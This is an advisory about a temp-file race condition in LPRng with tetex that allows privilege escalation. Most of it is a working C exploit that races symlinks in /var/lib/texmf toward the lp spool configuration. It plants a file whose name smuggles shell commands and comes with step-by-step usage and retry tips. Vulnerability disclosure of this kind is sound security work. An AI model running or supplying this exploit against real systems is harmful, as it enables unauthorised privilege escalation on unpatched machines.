COMMAND

    LPRng

SYSTEMS AFFECTED

    LPRng-3.7.4-23 (and earlier) + tetex-1.0.7-7 (and earlier?)

PROBLEM

    zen-parse@gmx.net  found  following.   If  the  tetex  package and
    LPRng are installed, there  is an exploitable race  condition with
    a tmp file that allows elevation of privs.

    It's fixed  in rawhide,  but that  doesn't really  help people who
    just use the provided up2date program to keep themselves secure.

    /********************************************************************
    Redhat Bugzilla reference:-
    
    https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=43342
    
     --zen-parse
    
    important info about this exploit:
    
     requires some fonts get made when its run.
     probably won't be a problem unless someone
     else has tried this exploit.
     just wait 90 days for /var/lib/texmf to clear
     and try again ;]
     or try print something different
     .dvi files are what does the trick.
    
    ********************************************************************/
    
    int shake()
    {
     int f;
     char r[1000];
     int w;
     f=fopen("/proc/loadavg","r");
     fscanf(f,"%*s %*s %*s %*s %s",r);
     fclose(f);
     w=atoi(r);
     return w;
    }
    void cow(char *s,char *t,int ofs)
    {
     sprintf(s,"/var/lib/texmf/lsR%d.tmp",ofs);
     sprintf(t,"%s/lsR%d.tmp",s,ofs);
    }
    
    main()
    {
     char s[1000];
     char t[1000];
     int y,i;
     printf("Put the stuff to run as lp:lp in /tmp/hax\n");
     printf("the lpr /usr/share/aspe<tab>/manual.dvi\n");
     printf("when the ! comes up, wait a second, then press control-C.\n\n");
     printf("Then print something.\n\n\n");
     close(open("/var/lib/texmf/cd ..\ncd ..\ncd ..\ncd ..\ncd ..\ncd ..\ncd tmp\nexport PATH=.\nhax\nexit 0",65,0666));
     while(1)
     {
      i=shake();
      for(y=-30;y<0;y++)
      {
       cow(s,t,y+i);
       if(!access(t,0))
       {
        printf("!\n");
        unlink(t);
        symlink("/var/spool/lpd/lp/postscript.cfg",t);
        sleep(1);
       }
      }
     }
    }

SOLUTION

    Nothing yet.